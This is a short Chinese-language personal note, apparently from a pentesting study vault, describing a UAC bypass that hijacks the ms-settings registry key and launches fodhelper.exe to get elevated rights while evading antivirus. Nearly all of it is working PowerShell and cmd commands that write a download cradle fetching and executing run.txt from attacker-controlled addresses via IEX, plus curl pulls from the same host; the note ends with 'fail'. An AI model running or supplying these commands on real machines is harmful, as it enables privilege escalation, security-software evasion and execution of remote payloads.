若已经在admin group 权限组内，但权限没有达到high 权限，可使用bypass uac 通过注册表来规避杀软 ![[Pasted image 20220914175849.png]] ``` New-Item -Path HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/run.txt') | IEX" -Force powrershell -c "New-ItemProperty -Path HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command -Name DelegateExecute -PropertyType String -Force" C:/Windows/System32/fodhelper.exe powershell -c \"New-Item -Path HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command -Value \"powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/run.txt') | IEX\" -Force\" cmd.exe /c curl http://192.168.49.84/x ; curl http://192.168.49.84/y ; powrershell -c \"New-ItemProperty -Path HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command -Name DelegateExecute -PropertyType String -Force\" ; cmd.exe /c C:/Windows/System32/fodhelper.exe fail ```